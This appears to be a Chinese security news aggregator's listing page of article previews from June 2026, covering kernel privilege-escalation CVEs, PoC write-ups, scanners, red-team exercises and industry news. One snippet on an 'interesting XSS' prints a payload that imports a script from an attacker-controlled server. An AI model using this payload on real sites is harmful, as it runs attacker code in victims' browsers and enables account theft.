全部安全开发新闻数码摄影汽车北京AIIT其他
  • 文章封面

    2026攻防演练必修高危漏洞集合(2.0版)

    作者:斗象智能安全发布日期:2026-06-29 15:30:36

    高危风险漏洞一直是国内护网期间企业网络安全防护的重点风险面。随着政企单位业务系统、办公协同、ERP、CRM、运维安全、视频安防、MES、指挥调度等系统逐步国产化,红队打点目标也会更多转向国内常见应用和

    阅读全文
  • 文章封面

    「智弈」AI智能体攻防实战沙龙 · 6.24圆满落幕

    作者:360漏洞云发布日期:2026-06-29 15:26:00

    6月24日,由360安全应急响应中心主办,360漏洞云与Aiker World联合支持的「智弈」AI智能体I攻防实战沙龙在北京国家会议中心举行。作为ISC.AI 2026大会期间的特色分论坛活动,沙龙

    阅读全文
  • 文章封面

    「智弈」AI智能体攻防实战沙龙 · 6.24圆满落幕

    作者:360安全应急响应中心发布日期:2026-06-29 14:49:45

    6月24日,由360安全应急响应中心主办,360漏洞云与Aiker World联合支持的「智弈」AI智能体I攻防实战沙龙在北京国家会议中心举行。作为ISC2026大会期间的安全专场活动,沙龙通过五场技

    阅读全文
  • 文章封面

    筑牢网安长城,安博通党支部获评“北京市新兴领域先进基层党组织”

    作者:安博通发布日期:2026-06-29 14:20:42

    今日上午,北京市新兴领域“两优一先”表彰大会隆重召开。北京市委常委、组织部部长李成林出席会议并讲话,北京市委社会工作部部长、市委“两新”工委书记、市委组织部副部长唐行安主持会议。会上正式公布了表彰名单

    阅读全文
  • 文章封面

    内网漏洞--NetNTLMv2泄露

    作者:安全天书发布日期:2026-06-29 14:07:41

    本文所涉及的技术、思路和工具仅用于安全测试和防御研究,切勿将其用于非法入侵或攻击他人系统等目的,一切后果由使用者自行承担!!!漏洞介绍在我对UNCanny项目的后续时,我注意到人们对那个基于UNC的强

    阅读全文
  • 文章封面

    知名手游AI公司获取用户游戏数据,竟被用于军事目的?!

    作者:Hacking黑白红发布日期:2026-06-29 12:52:05

    今天,国安部发了重要提醒,外媒曝光一款海外热门AR手游背后的AI公司,攒下了玩家上传的近300亿份实景扫描资料。这简直是藏在手机里的隐形扫描仪这家公司还和国外军工企业合作,这些实景数据极有可能拿去做

    阅读全文
  • 文章封面

    Dirty Frag蛰伏十年,非交互提权路径打通无TTY场景

    作者:船山信安发布日期:2026-06-29 12:20:00

    从2017年延续至今的主流内核版本中,Dirty Frag漏洞被公开后,低权限攻击者可利用内核的零拷贝优化路径,直接覆写理论上只读的页缓存Page Cache。只需几秒钟,/etc/passwd、SU

    阅读全文
  • 文章封面

    【已复现】Linux Kernel DirtyClone 本地权限提升漏洞(CVE-2026-43503)安全风险通告

    作者:奇安信 CERT发布日期:2026-06-29 12:11:43

    ● 点击↑蓝字关注我们,获取更多安全风险通告漏洞概述漏洞名称Linux Kernel DirtyClone 本地权限提升漏洞漏洞编号QVD-2026-28380,CVE-2026-43503公开时间2

    阅读全文
  • 文章封面

    利用工具批量挖掘SRC

    作者:掌控安全EDU发布日期:2026-06-29 12:07:56

    扫码领资料获网安教程本文由掌控安全学院 - yusi 投稿来Track安全社区投稿~ 千元稿费!还有保底奖励~(https://bbs.zkaq.cn)Serein 安装使用工具地址:https

    阅读全文
  • 文章封面

    倒计时 52天!数据安全“双罚制”全面落地,您的外部暴露面还在“裸奔”吗?

    作者:知道创宇发布日期:2026-06-29 12:00:00

    2026年6月18日,国家互联网信息办公室正式发布《网络数据安全风险评估办法》,明确宣布该办法将自2026年8月20日起正式施行。这意味着,留给各大企事业单位进行数据安全自查与风险评估的缓冲时间,已经

    阅读全文
  • 文章封面

    heavener:当你买不起 EDR 授权时会发生什么

    作者:securitainment发布日期:2026-06-29 11:50:00

    原文链接作者https://blog.otterpwn.com/projects/heavenerotterpwnheavener 是我过去 6 个月一直在开发的项目,大概也是我做过的最具雄心的事情。

    阅读全文
  • 文章封面

    【已复现】又见DirtyFrag新变体,DirtyClone (CVE-2026-43503) Linux 内核本地提权新漏洞

    作者:360漏洞研究院发布日期:2026-06-29 11:26:49

    Linux 内核网络子系统曝出本地权限提升漏洞(CVE-2026-43503,CVSS 8.8),本地攻击者通过非特权用户命名空间获取特定网络管理能力后,可利用该逻辑漏洞精确篡改页面缓存内存,从而实现

    阅读全文
  • 文章封面

    Shopify Shop 应用被利用推送虚假发票,电商用户遭精准诈骗

    作者:汇能云安全发布日期:2026-06-29 11:23:32

    6月29日,星期一,您好!中科汇能与您分享信息安全快讯:01Splunk PostgreSQL Sidecar 曝 CVSS 9.8 未认证 RCE,PoC 发布 6 天即遭野外利用Splunk En

    阅读全文
  • 文章封面

    6月29号刚刚通知!

    作者:乌雲安全发布日期:2026-06-29 11:00:00

    阅读全文
  • 文章封面

    一个有意思的xss

    作者:迪哥讲事发布日期:2026-06-29 11:00:00

    正文payload如下:<Img Src=//x55.js OnLoad=import(src)>x55.js可以设置为你自己的服务器地址一个完整的测试示例 假设你的 VPS 地址是 attacker

    阅读全文
  • 文章封面

    年下载量破千万,这个开源安全平台把SIEM和XDR的活全干了

    作者:知白守黑1024发布日期:2026-06-29 10:42:52

    Splunk 年费百万起步,QRadar 已经被 IBM 拆卖,开源安全监控到底有没有能打的?Wazuh 给了一个答案——一个项目同时覆盖 SIEM 和 XDR,年下载量超千万,GitHub 近 1.

    阅读全文
  • 文章封面

    Web资产信息收集与鉴权检测工具 -- VoidHawk

    作者:Web安全工具库发布日期:2026-06-29 10:18:42

    ===================================免责声明请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负

    阅读全文
  • 文章封面

    一 网安企业:将退市

    作者:HACK之道发布日期:2026-06-29 10:18:32

    2026 年 6 月 28 日,深圳国华网安科技股份有限公司发布《股票进入退市整理期交易的第二次风险提示公告》。2026 年 6 月 12 日,国华网安收到深圳证券交易所(以下简称“深交所”)《关于深

    阅读全文
  • 文章封面

    app逆向授权脱机

    作者:安全狗的自我修养发布日期:2026-06-29 10:13:35

    阅读全文
  • 文章封面

    【FDE前沿部署工程师】全国百城上岗计划二期来啦!

    作者:安全客发布日期:2026-06-29 10:00:00

    FDE前沿部署工程师纳米Work工程师 全国上岗计划二期启动!一、项目背景2026年,OpenClaw引爆AI Agent浪潮。越来越多企业开始部署智能体、购买AI盒子、尝试搭建自己的AI工作流。由此

    阅读全文
  • 文章封面

    c-ares TCP Use-After-Free 漏洞深度解析:从 DNS 响应序列到本地 Calculator 代码执行 PoC

    作者:Ots安全发布日期:2026-06-29 09:10:00

    威胁简报恶意软件漏洞攻击今天我们来深入剖析一个近期公开的 c-ares 库中的 TCP Use-After-Free(UAF)漏洞,并一步步讲解作者提供的本地 Calculator Proof-of-

    阅读全文
  • 文章封面

    【深度技术解析】objdump DLX 后端 Out-of-Bounds 写入导致的本地 ACE PoC 详解

    作者:Ots安全发布日期:2026-06-29 09:10:00

    威胁简报恶意软件漏洞攻击今天我们来详细拆解 GitHub 上一个非常有意思的 PoC 项目:bikini/exploitarium 中的 objdump-dlx-calc-poc。这个 PoC 利用的

    阅读全文
  • 文章封面

    CVE-2026-48907 Scanner

    作者:Ots安全发布日期:2026-06-29 09:10:00

    威胁简报恶意软件漏洞攻击概述masta-cve-2026-48907.py是一个完全原创的单文件Python 扫描器,旨在检测运行 JCE 编辑器组件版本低于 的 Joomla! 实例中的CVE-20

    阅读全文
  • 文章封面

    【CVE-2026-43503】DirtyClone 本地用户通过克隆数据包获得 Root 权限

    作者:骨哥说事发布日期:2026-06-29 09:08:57

    声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。防走失:https://gugesay.c

    阅读全文
  • 文章封面

    全国“两红两优”表彰|王欣荣获全国优秀共青团干部

    作者:安恒信息发布日期:2026-06-29 09:00:32

    喜报近日,共青团中央公布全国“两红两优”名单。安恒信息团委书记、第九党支部书记、高级副总裁、研究院院长,滨江团区委副书记(兼职)王欣荣获全国优秀共青团干部称号。这份荣誉的背后,是一个青年在国家网络安全

    阅读全文
  • 文章封面

    安恒信息护航长三角 “长江青锋杯”高校网安技能竞赛圆满落幕

    作者:安恒信息发布日期:2026-06-29 09:00:32

    6月25日-26日,第二届长三角“长江青锋杯”高校网安技能竞赛举行,本届赛事以“青锋砺剑 数盾护航”为主题,汇聚长三角21所高校、36支战队共108名选手同台比拼。赛事由安徽省委网信办、省教育厅、省数

    阅读全文
  • 文章封面

    写一个deepseek

    作者:Khan安全团队发布日期:2026-06-29 09:00:00

    阅读全文
  • 文章封面

    1v1论文指导!985/211专业对口导师手把手指导至录用!SCI/SSCI/EI/中文核心/毕业论文

    作者:Khan安全团队发布日期:2026-06-29 09:00:00

    最近听说一个很扎心的词:伪科研。每天泡在实验室、对着文献读到深夜、数据、代码、实验跑了一遍又一遍,看上去比谁都努力,可真正到了要输出成果的时候,却拿不出一篇完整、能用、够得上发表标准的论文。看似忙忙碌

    阅读全文
  • 文章封面

    欢迎加入!渗透攻防 + SRC 漏洞星球限时开放!

    作者:神农Sec发布日期:2026-06-29 09:00:00

    课程培训扫码咨询专注于SRC漏洞挖掘、红蓝对抗、渗透测试、代码审计JS逆向,CNVD和EDUSRC漏洞挖掘,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关

    阅读全文
  • 文章封面

    微信小游戏有漏洞?这个工具让你像调试网页一样透视小程序内部

    作者:只会看监控的实习生发布日期:2026-06-29 08:58:51

    First — 微信小程序安全调试工具> Frida + CDP 双引擎驱动 | 支持 macOS / Windows | 小程序安全研究与逆向分析利器产品定位First 是一款专注于微信小程序安全研

    阅读全文
上一页下一页